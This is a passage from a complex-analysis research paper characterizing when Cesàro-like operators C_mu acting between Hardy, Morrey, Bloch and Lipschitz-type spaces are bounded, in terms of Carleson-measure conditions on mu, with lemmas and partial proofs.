{f}(k)\right)z^{n}=\int_{0}^{1}\frac{f(tz)}{(1-tz)}d\mu(t),\ z\in\mathbb{D}. \tag{1.3}\] where \(\mu_{n}\) stands for the moment of order \(n\) of \(\mu\), that is, \(\mu_{n}=\int_{0}^{1}t^{n}d\mu(t)\). They studied the operators \(\mathcal{C}_{\mu}\) acting on distinct spaces of analytic functions(e.g. Hardy space, Bergman space, Bloch space, etc.). The Cesaro-like operator \(\mathcal{C}_{\mu}\) defined above has attracted the interest of many mathematicians. Jin and Tang [12] studied the boundedness(compactness) of \(\mathcal{C}_{\mu}\) from one Dirichlet-type space into another one. Bao, Sun and Wulan [7] studied the range of \(\mathcal{C}_{\mu}\) acting on \(H^{\infty}\). They proved that \(\mathcal{C}_{\mu}(H^{\infty})\subset\cap_{p>1}\Lambda_{\frac{1}{p}}^{p}\) if and only if \(\mu\) is a \(1\)-Carleson measure. This gives an answer to the question which was left open in [29]. In fact, they worked on a more general version. Just recently, Blasco [23] used a different method to also get the same result. Based on the previous results, it is natural to discuss the range of \(H^{\infty}\) under the action of \(\mathcal{C}_{\mu}\) when \(\mu\) is an \(\alpha\)-Carleson measure with \(0<\alpha<1\). Furthermore, what is the condition for the measure \(\mu\) such that \(\mathcal{C}_{\mu}(H^{p})\subset\cap_{q>1}\Lambda_{\frac{1}{q}}^{q}\)? We shall prove the following general version of the results, which give the answers to these questions. As consequences of our study, we may reproduce many of the known conclusions as well as obtain some new results. **Theorem 1.1**.: _Suppose \(0<p\leq\infty\), \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be subspace of \(H(\mathbb{D})\) with \(L^{2,\lambda}\subseteq X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\). Then \(\mathcal{C}_{\mu}(H^{p})\subseteq X\) if and only if \(\mu\) is a \(\frac{1+\lambda}{2}+\frac{1}{p}\)-Carleson measure._ **Theorem 1.2**.: _Suppose \(0<p<\infty\), \(1<q<\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\) such that \(H^{p}\subseteq X\subseteq\mathcal{B}^{1+\frac{1}{p}}\) and \(\Lambda_{\frac{1}{q}}^{q}\subseteq Y\subseteq\mathcal{B}\). Then the following statements hold. (1) The operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\) if and only if \(\mu\) is a \(1+\frac{1}{p}\)-Carleson measure. (2) If \(\mu\) is a \(1\)-logarithmic \(1+\frac{1}{p}\)-Carleson measure, then \(\mathcal{C}_{\mu}:X\rightarrow\Lambda_{1}^{1}\) is bounded._ If \(1\leq p<\infty\), we know that \(\mathcal{C}_{\mu}:BMOA\rightarrow\Lambda_{\frac{1}{p}}^{p}\) if and only if \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. Theorem 1.2 includes a characterization of those \(\mu\) so that \(\mathcal{C}_{\mu}\) maps \(L^{2,\lambda}\) into \(\Lambda_{\frac{1}{p}}^{p}\). In [29], the authors proved that if \(X\) and \(Y\) are spaces of holomorphic functions in the unit disc \(\mathbb{D}\), such that \(\Lambda_{\frac{1}{2}}^{2}\subseteq X,Y\subseteq\mathcal{B}\), then \(\mathcal{C}_{\mu}\) is a bounded operator from the space \(X\) into the space \(Y\) if and only if \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. Since \(\Lambda_{\frac{1}{2}}^{2}\subseteq BMOA=L^{2,1}\subseteq\mathcal{B}\), so that \(\mathcal{C}_{\mu}\) is a bounded operator from \(X\) into the space \(L^{2,1}\) if and only if \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. It is natural to ask what's the condition for \(\mu\) such that \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(L^{2,\lambda}\)? On the other hand, whether the space \(\Lambda_{\frac{1}{2}}^{2}\) can be extended to the space \(\Lambda_{1}^{1}\)? We are now ready to state our next results, which generalized the previous mentioned results. Our results also gives the range of \(X\) under the action of \(\mathcal{C}_{\mu}\) when \(\mu\) is a \(1\)-logarithmic \(s\)-Carleson measure with \(\frac{1}{2}<s<1\). **Theorem 1.3**.: _Suppose \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\) such that \(\Lambda_{1}^{1}\subseteq X\subseteq\mathcal{B}\) and \(L^{2,\lambda}\subset Y\subset\mathcal{B}^{\frac{3-\lambda}{2}}\). Then the following conditions are equivalent. (1) The operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\). (2) The measure \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure._ The boundedness of the operator \(\mathcal{C}_{\mu}\) acting on \(BMOA\) has been studied in [29, 7, 23]. The space of \(BMOA\) is close related to the Morrey space \(L^{2,\lambda}\). Since the Moreey space \(L^{2,\lambda}\) has showed up in a natural way in our work, it seems natural to study the action of the operators \(\mathcal{C}_{\mu}\) on the Moreey space \(L^{2,\lambda}\) for general values of the parameters \(\lambda\). The following result gives a complete characterization of the boundedness of \(\mathcal{C}_{\mu}\) act between different Morrey spaces. Note that the case of \(\lambda_{1}=1\) is contained in Theorem 1.3. **Theorem 1.5**.: _Suppose \(0<\lambda_{1}<1\), \(0<\lambda_{2}\leq 1\), \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\) such that \(L^{2,\lambda_{1}}\subseteq X\subseteq\mathcal{B}^{\frac{3-\lambda_{1}}{2}}\) and \(L^{2,\lambda_{2}}\subseteq Y\subseteq\mathcal{B}^{\frac{3-\lambda_{2}}{2}}\). Then the following statements are equivalent. (1) The operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\). (2) The measure \(\mu\) is a \(1+\frac{\lambda_{2}-\lambda_{1}}{2}\)-Carleson measure._ In section 2, we shall give some basic results that will be used in the proof. Section 3 will be devoted to present the proofs of Theorem 1.1-Theorem 1.5 and gives some relevant corollaries. It is necessary to clarify that the subspaces \(X\) and \(Y\) of \(H(\mathbb{D})\) we shall be dealing with are Banach spaces continuously embedded in \(H(\mathbb{D})\), to prove that the operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\) it suffices to show that it maps \(X\) into \(Y\) by using the closed graph theorem. Throughout the paper, the letter \(C\) will denote a positive constant which depends only upon the displayed parameters (which sometimes will be omitted) but not necessarily the same at different occurrences. Furthermore, we will use the notation \(Q_{1}\lesssim Q_{2}\) if there exists a constant \(C\) such that \(Q_{1}\leq CQ_{2}\), and \(Q_{1}\gtrsim Q_{2}\) is understood in an analogous manner. In particular, if \(Q_{1}\lesssim Q_{2}\) and \(Q_{1}\gtrsim Q_{2}\), then we write \(Q_{1}\asymp Q_{2}\) and say that \(Q_{1}\) and \(Q_{2}\) are equivalent. This notation has already been used above in the introduction. Preliminary Results **Lemma 2.1**.: _Let \(0<\alpha<\infty\) and \(f\in\mathcal{B}^{\alpha}\). Then for each \(z\in\mathbb{D}\), we have the following inequalities:_ \[|f(z)|\lesssim\begin{cases}||f||_{\mathcal{B}^{\alpha}},\text{ if }0<\alpha<1;\\ ||f||_{\mathcal{B}^{\alpha}}\log\frac{2}{1-|z|},\text{ if }\alpha=1;\\ \frac{||f||_{\mathcal{B}^{\alpha}}}{(1-|z|)^{\alpha-1}},\text{ if }\alpha>1.\end{cases}\] This well known Lemma can be found in [20]. **Lemma 2.2**.: _Let \(\alpha>0\) and \(f\in H(\mathbb{D})\), \(f(z)=\sum_{n=0}^{\infty}\widehat{f}(n)z^{n}\), \(\widehat{f}(n)\geq 0\) for all \(n\geq 0\). Then \(f\in\mathcal{B}^{\alpha}\) if and only if_ \[\sup_{n\geq 1}n^{-\alpha}\sum_{k=1}^{n}k\widehat{f}(k)<\infty.\] This result follows from Corollary 3.2 in [30] or Theorem 2.6 in [9]. **Lemma 2.3**.: _Let \(0<s<\infty\) and \(\mu\) be a finite positive Borel measure on the interval \([0,1)\). Then the following statements hold: (1) \(\mu\) is an \(s\)-Carleson measure if and only if \(\mu_{n}=O(\frac{1}{n^{s}})\). (2) \(\mu\) is a vanishing \(s\)-Carleson measure if and only if \(\mu_{n}=o(\frac{1}{n^{s}})\)._ This Lemma follows from Theorem 2.1 and Theorem 2.4 in [6]. The following integral estimates are useful. We only list the required ones. See [35] for the detailed proofs and other cases. **Lemma 2.4**.: _Suppose that \(r\geq 0,t\geq 0,\delta>-1,k\geq 0.\) Let_ \[J_{w,a}=\int_{\mathbb{D}}\frac{(1-|z|^{2})^{\delta}}{|1-z\overline{w}|^{t}|1- z\overline{a}|^{r}}\log^{k}\frac{e}{1-|z|^{2}}dA(z),\ \ w,a\in\mathbb{D}.\] _(1) If \(t+r-\delta>2\), \(t-\delta<2\) and \(r-\delta<2\), then_ \[J_{w,a}\asymp\frac{1}{|1-\langle w,a\rangle|^{t+r-\delta-2}}\log^{k}\frac{e}{ |1-\langle w,a\rangle|}.\] _(2) If \(t-\delta>2>r-\delta\), then_ \[J_{w,a}\asymp\frac{1}{(1-|w|^{2})^{t-\delta-n-1}|1-\langle w,a\rangle|^{r}} \log^{k}\frac{e}{1-|w|^{2}}.\] We also need the following estimates. (See e.g. Theorem 1.12 in [20]) **Lemma 2.5**.: _Let \(\alpha\) be any real number and \(z\in\mathbb{D}\). Then_ \[\int_{0}^{2\pi}\frac{d\theta}{|1-ze^{-i\theta}|^{\alpha}}\asymp\begin{cases}1& \text{ if }\,\alpha<1,\\ \log\frac{2}{1-|z|^{2}}&\text{ if }\,\alpha=1,\\ \frac{1}{(1-|z|^{2})^{\alpha-1}}&\text{ if }\,\alpha>1,\end{cases}\] The following result is known to experts. We give a detailed proof by using the integral estimates with double variable points. These integral estimates are practical and have its own interests. The reader is referred to [35, 32, 36] for various integral estimates. **Lemma 2.6**.: _Let \(0<\lambda<1\), then for any \(c\leq\frac{1-\lambda}{2}\), we have_ \[f(z)=\frac{1}{(1-z)^{c}}\in L^{2,\lambda}.\] Proof.: It is suffices to prove the case of \(c=\frac{1-\lambda}{2}\). For \(0<r<1\) and \(w\in\mathbb{D}\), by Proposition 3.1-(7) in [36] we have \[\int_{0}^{2\pi}\frac{d\theta}{|1-re^{i\theta}|^{3-\lambda}|1-r\overline{w}e^{ i\theta}|^{2}}\asymp\frac{1}{(1-r)^{2-\lambda}|1-r^{2}\overline{w}|^{2}}+\frac{1}{(1- r^{2}|w|)|1-r^{2}\overline{w}|^{3-\lambda}}.\] It is easy to check that \[\frac{1}{|1-r^{2}\overline{w}|^{2}}\lesssim\frac{1}{(1-r|w|)^{2}}\ \text{ and }\frac{1-r}{(1-r^{2}|w|)|1-r^{2}\overline{w}|^{3-\lambda}}\lesssim\frac{(1- r)^{\lambda-1}}{(1-r|w|)^{2}}.\] Using the polar coordinate formula and above inequalities we get \[||f||_{L^{2,\lambda}} \asymp\sup_{w\in\mathbb{D}}\left((1-|w|^{2})^{1-\lambda}\int_{ \mathbb{D}}|f^{\prime}(z)|^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}}\] \[\lesssim\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2}} \left(\int_{0}^{1}(1-r)\int_{0}^{2\pi}\frac{d\theta}{|1-re^{i\theta}|^{3- \lambda}|1-r\overline{w}e^{i\theta}|^{2}}dr\right)^{\frac{1}{2}}\] \[\asymp\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2}} \left(\int_{0}^{1}\frac{(1-r)^{\lambda-1}}{|1-r^{2}\overline{w}|^{2}}dr+\int_{ 0}^{1}\frac{1-r}{(1-r^{2}|w|)|1-r^{2}\overline{w}|^{3-\lambda}}dr\right)^{ \frac{1}{2}}\] \[\lesssim\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2}} \left(\int_{0}^{1}\frac{(1-r)^{\lambda-1}}{(1-r|w|)^{2}}dr\right)^{\frac{1}{2}}\] \[\lesssim 1.\] The last step above we have used the integral estimate \[\int_{0}^{1}\frac{(1-r)^{\lambda-1}}{(1-r|w|)^{2}}dr\asymp\frac{1}{(1-|w|)^{2- \lambda}},\] which can be found in the literature [37]. ## 3 Proofs of the main results First, we give some characterizations of positive Borel measures \(\mu\) on \([0,1)\) as logarithmic type Carleson measures, this will be used in our proofs. **Proposition 3.1**.: _Suppose \(\beta>0\), \(\gamma\geq 0\), \(0\leq q<s<\infty\) and \(\mu\) is a finite positive Borel measure on \([0,1)\). Then the following conditions are equivalent:_ 1. \(\mu\) _is a_ \(\gamma\)_-logarithmic_ \(s\)_-Carleson measure;_ 2. \[S_{1}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma} \frac{e}{1-|w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)<\infty;\] 3. \[S_{2}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma} \frac{e}{1-|w|}}{(1-t)^{q}|1-wt|^{s+\beta-q}}d\mu(t)<\infty.\] 4. \[S_{3}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma} \frac{e}{1-t}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)<\infty.\] Proof.: The proof of \((2)\Rightarrow(1)\) is straightforward. In fact, \[S_{1}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta} \log^{\gamma}\frac{e}{1-|w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\geq\int_{|w|}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma}\frac{e}{1-| w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\gtrsim\frac{\mu(|w|,1)\log^{\gamma}\frac{e}{1-|w|}}{(1-|w|)^{s}}.\] This finish the proof of \((2)\Rightarrow(1)\). Similarly, we may obtain \((3)\Rightarrow(1)\) and \((4)\Rightarrow(1)\). Since \((2)\Rightarrow(3)\) is obvious, to complete the proof we have to prove that \((1)\Rightarrow(2)\) and \((1)\Rightarrow(4)\). \((1)\Rightarrow(2)\). The proof of this implication follows closely the arguments of the proof of Proposition 2.1 in [7]. We include a detailed proof for completeness. It is suffices to consider the case \(w\in\mathbb{D}\) with \(\frac{1}{2}\leq|w|<1\) and \(q>0\). For every positive integer \(n\geq 1\), let \[Q_{0}(w)=\varnothing,Q_{n}(w)=\{t\in[0,1):1-2^{n}(1-|w|)\leq t<1\}.\] Let \(n_{w}\) be the minimal integer such that \(1-2^{n_{w}}(1-|w|)\leq 0\). Then \(Q_{n}(w)=[0,1)\) when \(n\geq n_{w}\). If \(t\in Q_{1}(w)\), then \[1-|w|\leq 1-|w|t.\] Also, for \(2\leq n\leq n_{w}\) and \(t\in Q_{n}(w)\backslash Q_{n-1}(w)\), we have \[(2^{n-1}-1)(1-|w|)=|w|-(1-2^{n-1}(1-|w|))\leq|w|-t\leq 1-|w|t.\] Notice that \(\beta>0\), \(\gamma\geq 0\), \(0<q<s<\infty\) and \(\mu\) is a \(\gamma\)-logarithmic \(s\)-Carleson measure, these together with above inequalities we have \[\int_{0}^{1}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w|)^{\beta}}{(1-t )^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[=\sum_{n=1}^{n_{w}}\int_{Q_{n}(w)\backslash Q_{n-1}(w)}\frac{\log ^{\gamma}\frac{e}{1-|w|}(1-|w|)^{\beta}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w |)^{q-s}}{2^{n(s+\beta-q)}}\int_{Q_{n}(w)\backslash Q_{n-1}(w)}\frac{1}{(1-t )^{q}}d\mu(t)\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w |)^{q-s}}{2^{n(s+\beta-q)}}\int_{0}^{\infty}x^{q-1}\mu\big{(}\big{\{}t\in[1-2^ {n}(1-|w|),1):1-\frac{1}{x}<t\big{\}}\big{\}}dx\] \[\asymp\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w|) ^{q-s}}{2^{n(s+\beta-q)}}\int_{0}^{\frac{1}{2^{n}(1-|w|)}}x^{q-1}\mu\big{(}[1 -2^{n}(1-|w|),1))dx\] \[\quad+\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w|) ^{q-s}}{2^{n(s+\beta-q)}}\int_{\frac{1}{2^{n}(1-|w|)}}^{\infty}x^{q-1}\mu \big{(}\big{[}1-\frac{1}{x},1\big{)}\big{)}dx\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w |)^{q-s}}{2^{n(s+\beta-q)}}\left(\frac{2^{ns}(1-|w|)^{s}}{\log^{\gamma}\frac{ e}{2^{n}(1-|w|)}}\int_{0}^{\frac{1}{2^{n}(1-|w|)}}x^{q-1}dx+\int_{\frac{1}{2^{n}(1-|w|) }}^{\infty}\frac{\log^{-\gamma}ex}{x^{s+1-q}}dx\right)\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{1}{2^{\beta n}}\frac{\log^{\gamma }\frac{e}{1-|w|}}{\log^{\gamma}\frac{e}{2^{n}(1-|w|)}}\lesssim\sum_{n=1}^{n_{w} }\frac{1}{2^{\beta n}}\left(1+\frac{n^{\gamma}\log 2}{\log^{\gamma}\frac{2}{2^{n}(1-|w|) }}\right)\lesssim\sum_{n=1}^{n_{w}}\frac{n^{\gamma}}{2^{\beta n}}\lesssim 1.\] This implies that \[S_{1}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}}{(1-t)^{q}(1-|w| t)^{s+\beta-q}}d\mu(t)<\infty.\] \((1)\Rightarrow(4)\). We only need consider the case of \(\gamma>0\). For \(0<\delta<s-q\), let \[f(t)=(1-t)^{\delta}\log^{\gamma}\frac{e}{1-t},\ \ 0\leq t<1.\] It is known that \(f\) is a normal function on \([0,1)\). Furthermore, we may choosing \(b=\delta\) and \(0<a=\varepsilon<\delta\) such that \[\frac{f(t)}{(1-t)^{b}}\mbox{is increasing},\ \frac{f(t)}{(1-t)^{a}}\mbox{is decreasing},\ \mbox{as}\ t\to 1^{-}.\] Hence, it follows form Lemma 2.2 in [34] that \[\frac{f(t)}{f(r)}\lesssim\left(\frac{1-t}{1-r}\right)^{\varepsilon}+\left( \frac{1-t}{1-r}\right)^{\delta} \tag{3.1}\] for all \(0<t,r<1\). Bearing in mind that \((1)\Leftrightarrow(2)\) we have proved already. By (3.1) we have \[\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma}\frac{e}{1-t}}{(1-t)^ {q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[=\int_{0}^{1}\frac{(1-|w|)^{\beta+\delta}\log^{\gamma}\frac{e}{1- |w|}}{(1-t)^{q+\delta}(1-|w|t)^{s+\beta-q}}\cdot\frac{f(t)}{f(|w|)}d\mu(t)\] \[\lesssim\int_{0}^{1}\frac{(1-|w|)^{\beta+\delta}\log^{\gamma}\frac {e}{1-|w|}}{(1-t)^{q+\delta}(1-|w|t)^{s+\beta-q}}\left\{\left(\frac{1-t}{1-|w |}\right)^{\varepsilon}+\left(\frac{1-t}{1-|w|}\right)^{\delta}\right\}d\mu(t)\] \[\lesssim\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma}\frac{e}{1 -|w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)+\int_{0}^{1}\frac{(1-|w|)^{\beta+ \delta-\varepsilon}\log^{\gamma}\frac{e}{1-|w|}}{(1-t)^{q+\delta-\varepsilon} (1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\lesssim 1.\] This gives \((4)\). **Remark 3.2**.: _For \(\gamma\in\mathbb{R}\) and \(0<s<\infty\), we may prove the following result in a same way._ \[\sup_{t\in[0,1)}\frac{\log^{\gamma}\frac{e}{1-t}\mu([t,1))}{(1-t)^{s}}<\infty \Leftrightarrow(3.1)\Leftrightarrow(3.2)\Leftrightarrow(3.3).\] We now present the proofs of Theorems 1.1-Theorem 1.5. _Proof of Theorem 1.1_ (1). If \(\mathcal{C}_{\mu}(H^{p})\subseteq X\), take \[f_{a}(z)=\frac{(1-a)}{(1-az)^{1+\frac{1}{p}}},\ \ 0<a<1.\] Then \(f_{a}\in H^{p}\) for all \(0<p\leq\infty\) and \(\sup_{0<a<1}||f_{a}||_{p}\lesssim 1\). This implies that \[\mathcal{C}_{\mu}(f_{a})\in X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}.\] It is easy to see that \[\mathcal{C}_{\mu}(f_{a})^{\prime}(z)=\int_{0}^{1}\frac{tf_{a}^{\prime}(tz)}{(1 -tz)}d\mu(t)+\int_{0}^{1}\frac{tf_{a}(tz)}{(1-tz)^{2}}d\mu(t).\] Since \(\mathcal{C}_{\mu}(f_{a})\in X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\), it follows from Lemma 2.1 that \[|\mathcal{C}_{\mu}(f_{a})^{\prime}(a)|\lesssim\frac{1}{(1-a)^{\frac{3-\lambda} {2}}},\ \ a\in(0,1).\] Then it follows that, for \(\frac{1}{2}<a<1\), \[\frac{1}{(1-a)^{\frac{3-\lambda}{2}}} \gtrsim\left|\int_{0}^{1}\frac{(1+\frac{1}{p})ta(1-a)}{(1-ta)(1-ta ^{2})^{2+\frac{1}{p}}}d\mu(t)+\int_{0}^{1}\frac{t(1-a)}{(1-ta)^{2}(1-ta^{2})^{ 1+\frac{1}{p}}}d\mu(t)\right|\] \[\gtrsim\int_{a}^{1}\frac{1}{(1-ta^{2})^{2+\frac{1}{p}}}d\mu(t)\] \[\gtrsim\frac{\mu([a,1))}{(1-a)^{2+\frac{1}{p}}}.\] This gives that \[\mu([a,1))\lesssim(1-a)^{\frac{1+\lambda}{2}+\frac{1}{p}}\ \ \mbox{for all}\ \ \frac{1}{2}<a<1.\] This implies that \(\mu\) is a \(\frac{1+\lambda}{2}+\frac{1}{p}\)-Carleson measure. On the other hand, suppose \(\mu\) is a \(\frac{1+\lambda}{2}+\frac{1}{p}\)-Carleson measure. Let \(L^{2,\lambda}\subseteq X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\), to prove \(\mathcal{C}_{\mu}(H^{p})\subseteq X\) it is sufficient to prove that \(\mathcal{C}_{\mu}:H^{p}\to L^{2,\lambda}\) is bounded. Without loss of generality, we may assume \(f\in H^{p}\) and \(f(0)=0\). By (1.3), we know that \[\mathcal{C}_{\mu}(f)^{\prime}(z)=\int_{0}^{1}\frac{tf^{\prime}(tz)}{(1-tz)}d \mu(t)+\int_{0}^{1}\frac{tf(tz)}{(1-tz)^{2}}d\mu(t),\quad z\in\mathbb{D}.\] Let \[\delta_{p}=\left\{\begin{array}{ll}\frac{1}{p}&0<p<\infty;\\ 0&p=\infty.\end{array}\right.\] It is known that (see e.g. page 36 in [27]) \[|f(z)|\lesssim\frac{||f||_{p}}{(1-|z|)^{\delta_{p}}},\] and hence \[|f^{\prime}(z)|\lesssim\frac{||f||_{p}}{(1-|z|)^{1+\delta_{p}}}.\] It follows that \[|\mathcal{C}_{\mu}(f)^{\prime}(z)| \leq\int_{0}^{1}\frac{|tf^{\prime}(tz)|}{|1-tz|}d\mu(t)+\int_{0}^{ 1}\frac{|tf(tz)|}{|1-tz|^{2}}d\mu(t)\] \[\leq||f||_{p}\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)^{1+\delta_ {p}}}+||f||_{p}\int_{0}^{1}\frac{d\mu(t)}{(1-t|z|)^{\delta_{p}}|1-tz|^{2}}\] \[\lesssim||f||_{p}\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)^{1+ \delta_{p}}}. \tag{3.2}\] Since \(0<\lambda<1\), we can choose a positive real number \(1-\lambda<\sigma<1\) such that \[\frac{1}{(1-t|z|)^{2+2\delta_{p}}}\leq\frac{1}{(1-t)^{2+2\delta_{p}-\sigma}(1 -|z|)^{\sigma}}. \tag{3.3}\] By (3.2) and Minkowski's inequality, (3.3), Lemma 2.4 and Proposition 3.1, we get \[||\mathcal{C}_{\mu}(f)||_{L^{2,\lambda}}\asymp\sup_{w\in\mathbb{D}} \left((1-|w|^{2})^{1-\lambda}\int_{\mathbb{D}}|\mathcal{C}_{\mu}(f)^{\prime}(z) |^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}}\] \[\lesssim||f||_{p}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda }{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)^{1+ \delta_{p}}}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z)\right)^{ \frac{1}{2}}\] \[\leq||f||_{p}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{ 2}}\int_{0}^{1}\left(\int_{\mathbb{D}}\frac{(1-|z|^{2})dA(z)}{(1-t|z|)^{2(1+ \delta_{p})}|1-tz|^{2}|1-z\overline{w}|^{2}}\right)^{\frac{1}{2}}d\mu(t)\] \[\lesssim||f||_{p}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\int_{0}^{1}\frac{1}{(1-t)^{1+\delta_{p}-\frac{\sigma}{2}}}\left( \int_{\mathbb{D}}\frac{(1-|z|)^{1-\sigma}dA(z)}{|1-tz|^{2}|1-z\overline{w}|^{ 2}}\right)^{\frac{1}{2}}d\mu(t)\] \[\asymp||f||_{p}\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|^{2} )^{\frac{2-\lambda}{2}}}{(1-t)^{1+\delta_{p}-\frac{\sigma}{2}}|1-tw|^{\frac{1 +\sigma}{2}}}d\mu(t)\] \[\lesssim||f||_{p}.\] Therefore, \(\mathcal{C}_{\mu}:H^{p}\to L^{2,\lambda}\) is bounded. The proof is complete. **Corollary 3.3**.: _Suppose \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Then \(\mathcal{C}_{\mu}:H^{\infty}\to L^{2,\lambda}\) is bounded if and only if \(\mu\) is a \(\frac{1+\lambda}{2}\)-Carleson measure._ **Remark 3.4**.: _If \(\frac{1}{2}<\alpha\leq 1\), then Corollary 3.3 show that \(\mu\) is an \(\alpha\)-Carleson measure if and only if \(\mathcal{C}_{\mu}(H^{\infty})\subseteq L^{2,2\alpha-1}\). When \(0<\alpha\leq\frac{1}{2}\) and \(\mu\) is an \(\alpha\)-Carleson measure, by Proposition 3.1 we have_ \[\sup_{z\in\mathbb{D}}(1-|z|^{2})^{2-\alpha}|\mathcal{C}_{\mu}(f)^{ \prime}(z)| \lesssim||f||_{H^{\infty}}\sup_{z\in\mathbb{D}}\int_{0}^{1}\frac{ (1-|z|^{2})^{2-\alpha}d\mu(t)}{(1-t|z|)|1-tz|}\] \[\lesssim||f||_{H^{\infty}}\sup_{z\in\mathbb{D}}\int_{0}^{1}\frac{ (1-|z|^{2})^{1-\alpha}d\mu(t)}{|1-tz|}\] \[\lesssim||f||_{H^{\infty}}.\] _This yields that \(\mathcal{C}_{\mu}(H^{\infty})\subseteq\mathcal{B}^{2-\alpha}\).\(\square\)_ For \(2<p\leq\infty\), it follows from Theorem 9 in [39] that the Cesrao operator \(\mathcal{C}\) is bounded from \(H^{p}\) to \(L^{2,1-\frac{2}{p}}\). As a consequence of Theorem 1.1, we have the following result. **Corollary 3.5**.: _Suppose \(2<p\leq\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Then \(\mathcal{C}_{\mu}:H^{p}\to L^{2,1-\frac{2}{p}}\) is bounded if and only if \(\mu\) is a \(1\)-Carleosn measure._ Proof of Theorem 1.2 (1).: The proof of necessity is similar to that Theorem 1.1 and hence omitted. For the sufficiency, it is suffices to show that \(\mathcal{C}_{\mu}(\mathcal{B}^{1+\frac{1}{p}})\subseteq\Lambda_{\frac{1}{q}}^ {q}\) when \(\mu\) is an \(1+\frac{1}{p}\)-Carleson measure. Notice that (3.2) is remain valid for all \(f\in\mathcal{B}^{1+\frac{1}{p}}\). By (3.2) and the Minkowski inequality, Lemma 2.5 and Proposition 3.1 we have \[\sup_{0<r<1}(1-r)^{1-\frac{1}{q}}\left(\frac{1}{2\pi}\int_{0}^{2 \pi}|\mathcal{C}_{\mu}(f)^{\prime}(re^{i\theta})|^{q}d\theta\right)^{\frac{1}{ q}}\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0<r<1}(1-r)^{1-\frac{1} {q}}\left(\frac{1}{2\pi}\int_{0}^{2\pi}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tre^ {i\theta}|(1-tr)^{1+\delta_{p}}}\right)^{q}d\theta\right)^{\frac{1}{q}}\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0<r<1}(1-r)^{1-\frac{1} {q}}\int_{0}^{1}\left(\frac{1}{2\pi}\int_{0}^{2\pi}\frac{1}{|1-tre^{i\theta}| ^{q}(1-tr)^{q(1+\delta_{p})}}d\theta\right)^{\frac{1}{q}}d\mu(t)\] \[\lesssim 